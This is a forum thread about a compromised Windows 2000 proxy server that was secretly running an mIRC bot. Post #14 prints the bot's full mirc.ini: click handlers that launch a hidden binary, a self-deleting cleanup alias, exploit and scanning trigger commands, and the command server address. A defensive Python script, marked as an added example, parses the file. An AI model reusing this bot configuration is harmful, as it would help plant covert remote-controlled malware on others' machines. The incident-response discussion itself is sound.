
Thread: I need some help on a PC problem....

  1. #1
    RoundEye (Court Jester)


    ...maybe a mod can figure out if this is hardware, software or security?

    Here's the deal:
    Win2K server with WinProxy 3.0 and two NICs, serving about 20 clients on a DSL line using EnterNet 300 software.

    It bluescreens when sharing the internet with Stop: 0x000000D1 DRIVER_IRQL_NOT_LESS_OR_EQUAL.
    It points to two different addresses at different times when it bluescreens: 39f75bbc - nat.sys and 3a6407b5 - mrxsmb.sys. (There's a whole lot more numbers in the stop error.)

    It will also randomly redirect me to another webpage when I try to download something (like when I was downloading drivers).

    In Add/Remove Programs it has mIRC and KFGH installed, and nobody has any idea how they got there, or even what KFGH is. mIRC won't let me uninstall it unless I stop the service first, but I don't know which service it is.

    When I reboot the PC it will change the clock settings by around six to ten hours, but the BIOS stays at the right time. I tried to change the battery anyway, but that didn't work.

    I've updated the chipset drivers and installed Service Pack 3.

    I've installed a new video card, new RAM and two new Intel NICs and it still bluescreens.

    OK people, what the f*** is up with this server?!?!

  2. #2
    Randy (Resident Rodent)
    no fricken idea... sorry ahwell qwik^bump

    I was going to post a link to that thread, but the SG search results for "bullsh|t" were too numerous

    sometimes you have to think outside the box to get inside the box .

  3. #3
    nightowl (Senior Member)


    Originally posted by RoundEye
    ...maybe a mod can figure out if this is hardware, software or security?

    Here's the deal:
    Win2K server with WinProxy 3.0 and two NICs, serving about 20 clients on a DSL line using EnterNet 300 software.

    It bluescreens when sharing the internet with Stop: 0x000000D1 DRIVER_IRQL_NOT_LESS_OR_EQUAL.
    It points to two different addresses at different times when it bluescreens: 39f75bbc - nat.sys and 3a6407b5 - mrxsmb.sys. (There's a whole lot more numbers in the stop error.)

    It will also randomly redirect me to another webpage when I try to download something (like when I was downloading drivers).

    In Add/Remove Programs it has mIRC and KFGH installed, and nobody has any idea how they got there, or even what KFGH is. mIRC won't let me uninstall it unless I stop the service first, but I don't know which service it is.

    When I reboot the PC it will change the clock settings by around six to ten hours, but the BIOS stays at the right time. I tried to change the battery anyway, but that didn't work.

    I've updated the chipset drivers and installed Service Pack 3.

    I've installed a new video card, new RAM and two new Intel NICs and it still bluescreens.

    OK people, what the f*** is up with this server?!?!
    Sounds like there is an IRQ problem between the two network cards. Try manually assigning them two different IRQs, and if that doesn't work, take one of the cards and put it in a different slot.

  5. #5
    YeOldeStonecat (Moderator)
    I moved it here; hopefully more knowing eyes on it over here.

    That error is usually driver related, or a bad service installed.

    http://www.microsoft.com/technet/tre...d_stp_ottj.asp

    DRIVER_IRQL_NOT_LESS_OR_EQUAL leads many to think it's hardware IRQ related, but it's actually driver IRQ related: interrupt request in memory.

    I've read about a lot of nightmares installing EnterNet software on servers. Many server guide sites mention never to install any PPPoE software on servers. If you need a PPPoE connection, and you want to multi-home your server (2x NICs), then set a router on the WAN NIC and let the router do the PPPoE logon for the server.

    The fact that mIRC, and whatever that KFGH is, appear without you installing them would scare the heck out of me, wondering if someone hacked in and is running an mIRC relay or spoofing by using your server.

    I'm not familiar with WinProxy and how it uses DNS, but how is your DNS set up? Are you running AD on that server? Using its own DNS, with DNS properties set to forward to the ISP's DNS servers? TCP properties for both NICs are_____?

    The time changes we can cure with W32Time: set it to a public time server. I'll give you a good link for that; I have a great article at work I'll link to.

    If it's servicing 20 clients, I imagine it's a server in place at some office already. I'm just wondering how much "down time" you may have with it. Trying to feel out how open you are to re-installing.

  6. #6
    RoundEye (Court Jester)
    Thanks everybody, I'm starting to think the server has been compromised. I'm going to do some security checks in just a little while. The mIRC being installed and some other things I've read make me think that; also the link norm posted seems to be like other things I've read. This Link.

    Thanks for coming back and hanging out, norm.

    The guy that takes care of the PC now didn't even have an admin password set up.

    YOSC, the DNS is being taken care of by WinProxy. I'm thinking about removing as many services from WinProxy as I can and letting Win2K take care of them. DHCP is also taken care of by WinProxy.

    I've thought about reformatting, but if security has been breached, the backup tapes are likely compromised too.

    I'm on my way there, I'll let y'all know what's up later on today.

  7. #7
    > Can anyone tell me what the following is: I have a win2000
    > server and three boxes keep coming up on the desktop. KFGH
    > (a hammer beside it), Status(empty Box) mIRC Options(empty
    > box with a cancel button)...Hopefully someone can help
    > please respond via email: jsimmons@khitomer.com

    I'm seeing this too. I think after installing Total Recorder from
    Download.com. I tried to uninstall, but it fails. If I go into the
    registry I can delete three or four keys referring to it, but there is
    one that will not delete; when I restart it shows up. I also noticed
    my MusicMatch and Windows CD player no longer play CDs.

    Not good RoundEye...something is up.

    ...formerly the omnipotent UOD

  9. #9
    RoundEye (Court Jester)
    Well, I restarted the server in safe mode and uninstalled mIRC. I found a mirc.ini file in the system32 folder. I opened it in Notepad and it was full of hacker info. The user name was Angel of Death, plus some other stuff. I wish I hadn't forgotten to copy it to a floppy; I'll get it on Monday and post it.

    Once I removed mIRC and KFGH, the server ran fine after that. I think somebody was using the server for a DDoS attack. See here. Even after a full scan with up-to-date virus software this file didn't show up.

  10. #10
    Originally posted by RoundEye
    Well, I restarted the server in safe mode and uninstalled mIRC. I found a mirc.ini file in the system32 folder. I opened it in Notepad and it was full of hacker info. The user name was Angel of Death, plus some other stuff. I wish I hadn't forgotten to copy it to a floppy; I'll get it on Monday and post it.

    Once I removed mIRC and KFGH, the server ran fine after that. I think somebody was using the server for a DDoS attack. See here. Even after a full scan with up-to-date virus software this file didn't show up.
    What antivirus was being used?

    ...formerly the omnipotent UOD

  11. #11
    Good stuff, RoundEye, glad to hear you found out what was going on.

    If I wasn't in fear of losing my ISP service, and the law, I'd be "hacking back" at some of these jerks. See if they can take what they dish out, if you know what I mean.

    You know how easy it is to write a virus that no virus scanner will catch? Very easy. I could do it in about an hour. The trick is getting it to execute on another machine. It's easy on the average user's machine, but not so easy on an experienced user's.

  12. #12
    RoundEye (Court Jester)
    Originally posted by UOD
    What antivirus was being used?
    It wasn't really a virus like the link I posted; somehow they got mIRC installed on the server. One of the employees has a mapped Kazaa folder with tons of porn in it. I bet that's how they got access into the server in the first place.

    I'm going to call him on Monday and get him to delete it and uninstall Kazaa. The **** hit the fan Friday when the office manager found out what happened. The lady is in her late 50's and I had to listen to bitching for about three hours. I was so damn aggravated at that point I called my office. One of the guys I work with told my boss, and he called and got her to calm down. My God, I just wanted to walk up and poke that lady in her eye; I just couldn't take the nagging and bitching any longer.

    I keep trying to tell people that on a proxy server you make sure that nothing is bound to the external NIC except for TCP/IP, and make sure that NetBIOS over TCP/IP is disabled, but some ******* people refuse to listen.

    Here's why: One and Two

  13. #13
    YeOldeStonecat (Moderator)
    Even on multi-homed servers, I prefer a router on that external NIC. It pushes the "wild side" out one step further.

  14. #14
    RoundEye (Court Jester)
    So what can you tell me from this file? It's the mIRC .ini file that I deleted; I opened it up with Notepad and this is what I got. Also, I can't get email to send or receive anywhere on this network through WinProxy. I tried about a billion different configs today; I think something in Win2K or WinProxy is corrupt now.

    [files]
    addrbk=addrbk.ini
    servers=servers.ini
    browser=c:\program files\internet explorer\iexplore.exe
    emailer=c:\program files\outlook express\msimn.exe
    finger=finger.txt
    urls=urls.ini
    [warn]
    fserve=off
    dcc=off
    [options]
    n0=1,0,0,0,0,0,300,1,0,1,1,0,0,0,1,1,0,1,1,1,4096,0,0,0,0,0,1,1,0,50,1,0
    n1=5,100,0,0,0,0,0,0,7,1,1,1,0,0,1,1,0,0,0,0,1,1,0,0,20,0,0,0,0,2,0,0,0
    n2=0,0,0,1,1,1,1,1,0,60,120,0,0,1,1,0,1,0,0,120,20,999,0,0,1,0,1,1,0,0,0
    n3=200,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,1,0,1,0,0,0,0,360,21600
    n4=0,0,1,1,0,0,9999,0,0,1,1,0,1024,0,1,9999,30,0,0,0,0,0,0,3,1,5000,0,2,0,0,2
    n5=1,1,1,1,1,1,1,1,1,1,6667,500000,0,0,0,0,1,1,300,30,10,0,0,22,0,0,0,100000,1,0,0,25
    n6=0,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,100,1,1,0,0,0,0,0,2,1
    n7=0,0,0,0,0,0,1,0,0
    [about]
    version=5.9
    show=magnitude
    [dirs]
    [fonts]
    fscripts=Arial,412,0
    fstatus=Arial,413,0
    fchannel=Wingdings,407,2
    fquery=Wingdings,407,2
    [events]
    default=2,2,2,2,2,1,1,2
    [text]
    commandchar=\
    linesep=-
    timestamp=[HH:nn]
    accept=*.*
    ignore=*.exe,*.com,*.bat,*.dll,*.ini,*.mrc,*.vbs,*.js,*.pif,*.scr,*.lnk,*.pl,*.shs,*.htm,*.html
    network=All
    lastreset=[no date]
    [ports]
    random=on
    bind=off
    [ident]
    active=yes
    userid=raina78
    system=UNIX
    port=113
    [socks]
    enabled=no
    port=1080
    method=4
    dccs=no
    [sjis]
    enabled=no
    [dde]
    ServerStatus=on
    ServiceName=SonyDrone2
    CheckName=off
    [marker]
    show=on
    size=20
    colour=1
    method=1
    [fileserver]
    homedir=C:
    warning=off
    [dccserver]
    n0=0,59,0,0,0,0
    [agent]
    enable=0,0,0
    char=merlin.acs
    options=0,0,0,100,0
    speech=150,60,100,1,180,10,50,1,1,1,0,50,1
    channel=1,1,1,1,1,1,1,1,1
    private=1,1,1,1
    other=1,1,1,1,1,1,1
    pos=20,20
    [mirc]
    user=Angel of Death
    email=blah
    nick=SYN-[9343]
    anick=SYN-[6966]
    host=beasts.tosham.comSERVER:beasts.tosham.com:6667
    [windows]
    main=-10,112,-10,27,0,-1,-1
    wchannel=0,373,0,212,0,1,0
    scripts=-7,1036,3,764,0,0,0
    wserv=28,123,28,34,1,1,0
    wquery=56,359,56,221,0,1,0
    status=0,112,0,27,0,1,0
    wdccg=-1,269,-1,264,0,1,0
    wlist=-1,510,-1,267,0,1,0
    wdccs=-1,269,-1,271,0,1,0
    [colours]
    n0=0,6,4,5,2,3,3,3,3,3,3,1,5,7,6,1,3,2,3,5,1,0,1,0,1,15
    [pfiles]
    n0=popups.ini
    n1=popups.ini
    n2=popups.ini
    n3=popups.ini
    n4=popups.ini
    [clicks]
    status=//run empavms.exe /n /fh expl32 | /nick DT-Status $+ $rand(0,99999) | /msg %chan USER DOUBLE CLICKED STATUS SCREEN!
    query=//run empavms.exe /n /fh expl32 | /nick DT-Query $+ $rand(0,99999) | /msg %chan USER DOUBLE CLICKED QUERY SCREEN!
    channel=//run empavms.exe /n /fh expl32 | /nick DT-Channel $+ $rand(0,99999) | /msg %chan USER DOUBLE CLICKED CHANNEL SCREEN!
    nicklist=//run empavms.exe /n /fh expl32 | /nick DT-NickList $+ $rand(0,99999) | /msg %chan USER DOUBLE CLICKED NICKLIST SCREEN!
    notify=//run empavms.exe /n /fh expl32 | /nick DT-Notify $+ $rand(0,99999) | /msg %chan USER DOUBLE CLICKED NOTIFY SCREEN!
    message=//run empavms.exe /n /fh expl32 | /nick DT-Message $+ $rand(0,99999) | /msg %chan USER DOUBLE CLICKED MESSAGE SCREEN!
    [wizard]
    warning=6
    [nicklist]
    [layers]
    mirc=0
    enable=1,1,1,1,1,1,1,1,1,1
    others=75
    [Script]
    alias wrd { write del.bat $$1- }
    alias makedel { write -c del.bat | wrd ping 127.0.0.1 -n 4 | wrd del aliases.ini | wrd del bnc.dll | wrd del uptodo.exe | wrd del empavms.exe | wrd del EXPL32.EXE | wrd del wincmd32.bat | wrd del impvms.dll | wrd del ircd.conf | wrd del ircd.pid | wrd del mirc.ini | wrd del proxy.hash | wrd del psexec.exe | wrd del remote.ini | wrd del restart.exe | wrd del script1.dll | wrd del wircd.exe | wrd del dl.mrc | wrd del moo.dll | wrd del unicodbag.txt | wrd del svchost32.exe | wrd del PSKILL.EXE | wrd del norton.bat | wrd del button.exe | wrd del config.hfg | wrd del Libparse.exe | wrd del nicks.txt | wrd del identd.txt | wrd del close.dll | wrd del del.bat }
    [waves]
    send=Event Beep
    [dragdrop]
    n0=*.wav:/sound $1 $2-
    n1=*.*:/dcc send $1 $2-
    s0=*.*:/dcc send $1 $2-
    [Perform]
    n0=//join %chan
    [local]
    local=adsl-157-7-56.msy.bellsouth.net
    localip=66.157.7.56
    longip=1117587256

    [findtext]
    n0=!gethost
    n1=%Scan.Range
    n2=!stopscan
    n3=inactive
    n4=!getscanner
    n5=!aim.join
    n6=toc_chat_
    n7=msg %chan
    n8=msg %chan joined
    n9=msg %chan joined %
    n10=nhtml.dll
    n11=msg %chan
    n12=dtkode.txt
    n13=[DT-GT] [IIS]
    n14=dtk0de.txt
    n15=testuni.txt
    n16=textuni.txt
    n17=unicod_ready
    n18=unicod_ready.txt
    n19=isin
    [afiles]
    n0=aliases.ini
    [extensions]
    n0=defaultEXTDIR:
    [rfiles]
    n0=remote.ini
    n1=remote.ini
    n2=bnc.dll
    n3=impvms.dll
    n4=script1.dll
    n5=config.hfg
    n6=reg.xpl
    n7=spig.txt
    n8=msccctl32.ocx
    n9=tools.txt
    n10=tools2.txt

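    The posted mirc.ini is a typical bot configuration, and the parts a responder needs can be pulled out mechanically. The following Python script is an added example, not code from the thread or from mIRC: it parses a trimmed, constructed copy of the file above (window geometry and [options] rows left out) and reports the IRC server the client is pointed at, the program the [clicks] handlers launch with /run, the files the [Script] cleanup alias deletes, the extra script and DLL files named in [rfiles], the command strings in [findtext], and whether [fileserver] exposes a whole drive. The INI reader is a simplified one written for this example; it assumes alias bodies contain no "=".

```python
"""Triage an mIRC-style .ini from a suspected bot install (added example,
not code from the thread or from mIRC). Pulls out what a responder reads
first: the IRC server, what /run launches, what the cleanup alias deletes,
which extra script/DLL files are loaded, and file-server exposure.
"""
import re

# Constructed sample: a trimmed copy of the posted mirc.ini. The window
# geometry and [options] number rows carry nothing useful and are omitted.
SAMPLE_INI = r"""
[warn]
fserve=off
dcc=off
[mirc]
user=Angel of Death
nick=SYN-[9343]
anick=SYN-[6966]
host=beasts.tosham.comSERVER:beasts.tosham.com:6667
[fileserver]
homedir=C:
warning=off
[clicks]
status=//run empavms.exe /n /fh expl32 | /nick DT-Status $+ $rand(0,99999) | /msg %chan USER DOUBLE CLICKED STATUS SCREEN!
[Script]
alias wrd { write del.bat $$1- }
alias makedel { write -c del.bat | wrd ping 127.0.0.1 -n 4 | wrd del aliases.ini | wrd del bnc.dll | wrd del psexec.exe | wrd del mirc.ini | wrd del del.bat }
[Perform]
n0=//join %chan
[local]
localip=66.157.7.56
[findtext]
n0=!gethost
n2=!stopscan
[rfiles]
n0=remote.ini
n2=bnc.dll
n3=impvms.dll
"""


def parse_mirc_ini(text):
    """Return {section: [(key, value)]}; bare lines (alias bodies) get key None.
    Assumption: an '=' inside an alias body would be mis-split; the sample has none."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1)
            sections.setdefault(current, [])
            continue
        if current is None:
            continue  # text before the first section header
        key, sep, value = line.partition("=")
        sections[current].append((key.strip(), value.strip()) if sep else (None, line))
    return sections


def triage(sections):
    """Extract the fields worth acting on from parsed sections."""
    def keyed(name):  # key=value pairs of a section as a dict
        return {k: v for k, v in sections.get(name, []) if k is not None}

    def values(name):  # all values of a section, bare lines included
        return [v for _, v in sections.get(name, [])]

    report = {}
    mirc = keyed("mirc")
    # mIRC stores the chosen server as "<host>SERVER:<host>:<port>"
    srv = re.search(r"SERVER:([^:\s]+):(\d+)", mirc.get("host", ""))
    report["irc_server"] = (srv.group(1), int(srv.group(2))) if srv else None
    report["nicks"] = [mirc[k] for k in ("nick", "anick") if k in mirc]
    # Programs started with /run from double-click handlers
    report["run_binaries"] = sorted({b for v in values("clicks")
                                     for b in re.findall(r"/run\s+(\S+)", v)})
    # Files the self-cleanup alias deletes: every name here is worth searching for
    report["deleted_files"] = sorted({f for v in values("Script")
                                      for f in re.findall(r"\bdel\s+(\S+)", v)})
    report["loaded_scripts"] = sorted(values("rfiles") + values("afiles"))
    report["triggers"] = values("findtext")  # command strings the bot watches for
    report["autojoin"] = values("Perform")
    report["local_ip"] = keyed("local").get("localip")
    fserve = keyed("fileserver")
    report["fileserver_root_share"] = bool(re.fullmatch(r"[A-Za-z]:\\?", fserve.get("homedir", "")))
    report["warnings_disabled"] = sorted(k for k, v in keyed("warn").items() if v == "off")
    return report


if __name__ == "__main__":
    for field, found in triage(parse_mirc_ini(SAMPLE_INI)).items():
        print(f"{field:24} {found}")
```

    Run as a script it prints one line per field. The deleted_files list is the useful part for RoundEye's situation: those names are what to look for on the other machines and on the backup tapes before trusting a restore, and the irc_server value is what to block at the router and search for in proxy logs.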
  15. #15
    CableDude (Certified SG Addict)
    Question about the installed mIRC. Who has the rights to do that?

    I mean it just didn't get installed by itself somehow, right?

  16. #16
    Originally posted by CableDude
    Question about the installed mIRC. Who has the rights to do that?

    I mean it just didn't get installed by itself somehow, right?

    Security on a PC is really nonexistent. There are just multiple levels of weakness. A well-versed, knowledgeable person can get past any security; it depends on how much they know.
